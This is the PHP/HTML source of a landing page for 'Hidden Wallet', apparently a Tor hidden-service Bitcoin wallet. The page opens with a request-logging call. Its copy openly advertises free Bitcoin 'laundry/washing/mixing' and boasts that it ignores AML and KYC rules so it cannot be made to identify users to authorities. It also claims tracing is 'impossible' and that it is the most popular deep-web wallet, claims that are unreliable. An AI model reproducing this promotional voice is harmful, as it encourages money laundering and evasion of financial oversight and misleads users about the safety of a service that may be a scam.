<?php
	require("logger.php");
	logRequest(1);
?>
<!DOCTYPE html>
<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta charset="UTF-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" name="viewport"><title>Hidden Wallet</title><link href="favicon.ico" rel="shortcut icon" type="image/x-icon"><link href="HiddenWalletHome_files/semantic.css" media="screen" rel="stylesheet" type="text/css"><link href="HiddenWalletHome_files/style.css" media="screen" rel="stylesheet" type="text/css"><link href="HiddenWalletHome_files/checkbox.css" media="screen" rel="stylesheet" type="text/css"><link href="HiddenWalletHome_files/form.css" media="screen" rel="stylesheet" type="text/css"><script src="HiddenWalletHome_files/jquery-3.js"></script><script src="HiddenWalletHome_files/checkbox.js"></script><script src="HiddenWalletHome_files/form.js"></script><script src="HiddenWalletHome_files/app.js"></script></head><body><div class="pusher"><div class="ui inverted vertical masthead center aligned segment"><div class="ui container"><div class="ui large secondary inverted pointing menu"><a class="active item" href="index.php">Home</a><a class="item" href="FAQ.php">FAQ</a><a class="item" href="Terms.php">Terms</a><div class="right item"><a class="ui inverted button" href="Login.php">Log in</a><a class="ui inverted button" href="Register.php">Register</a></div></div></div><div class="ui text container"><h1 class="ui inverted header">Hidden Wallet</h1><h1>simple and secure</h1><br><a class="ui huge primary button" href="Register.php">Get Started</a></div></div></div><div class="ui vertical stripe segment"><div class="ui middle aligned centered stackable grid container"><h1 class="ui header">Hidden
 wallet is the most popular anonymous wallet on the deep web. We are on a
 mission to build a more open, anonymous, and fair financial future 
integrated in a single piece of software.</h1><div class="row"><div class="six wide column"><p style="padding:10px"><i class="big protect icon"></i>Bank-grade security for your Bitcoin.</p><p style="padding:10px"><i class="big expeditedssl icon"></i>Cold storage security with online ease.</p></div><div class="six wide column"><p style="padding:10px"><i class="big hide icon"></i>Hidden Wallet can never access your keys or Bitcoin.</p><p style="padding:10px"><i class="big exchange icon"></i>Each time you transfer bitcoins to your Hidden Wallet, they are mixed for extra security.</p></div></div></div></div><div class="ui vertical stripe segment"><div class="ui middle aligned centered stackable grid container"><div class="row"><div class="ten wide column"><h3 class="ui header">Why shoud you choose us?</h3><p>That "anonymity" is easily destroyed when you deal with Bitcoin Exchanges for example, which know your real identity.</p><p>Most
 of the Bitcoin Exchange services comply with AML and KYC policies so 
it's really hard to be anonymous to government agencies when dealing 
with bitcoins.</p><p>Hidden Wallet helps you break that chain, since 
it's hosted on Tor, noone knows who you are because we don't comply to 
any AML or KYC policies, so we can't be forced to reveal our users 
informations.</p><p>Even if we wanted to do that, we don't have much information about our users because they are using Tor.</p><p>We mix all your bitcoins, which makes tracing you impossible.</p></div><div class="four wide right floated column"><img class="ui medium rounded image" src="HiddenWalletHome_files/bitcoin2.svg"></div></div></div></div><div class="ui vertical stripe segment"><div class="ui middle aligned centered stackable grid container"><div class="row"><div class="four wide column"><img class="ui medium rounded image" src="HiddenWalletHome_files/tor.svg"></div><div class="ten wide right floated column"><h3 class="ui header">Bitcoin and Tor, a perfect Team</h3><p>When
 using Bitcoin together with Tor you are combining the best online 
currency with the best encryption and privacy technology available.</p><p>When you're using normal internet websites to manage your bitcoin funds you can't know who's tracing you.</p><p>Only a shared Web Wallet on Tor will provide you with maximum anonymity and privacy.</p></div></div></div></div><div class="pusher"><div class="ui vertical stripe center aligned segment"><div class="ui text container"><h3 class="ui header">Free Bitcoin Laundry/Washing/Mixing</h3><p>Launder your Bitcoins for free, all we charge is the network fee of 0.001 BTC which we fully pay to the network.</p><p>To
 mix your bitcoins it's best to use a Tor hidden service like Hidden 
Wallet because clearweb operating mixers such as BitcoinFog are subject 
to government control.</p><a class="ui huge primary button" href="Register.php">Get Started</a></div></div></div><div class="ui inverted vertical footer segment"><div class="ui container"><p><span>© 2009-2020 Hidden Wallet | Tor Anonymous Hidden Bitcoin Wallet |</span><a href="PrivacyPolicy.php">Privacy Policy</a></p></div></div></body></html>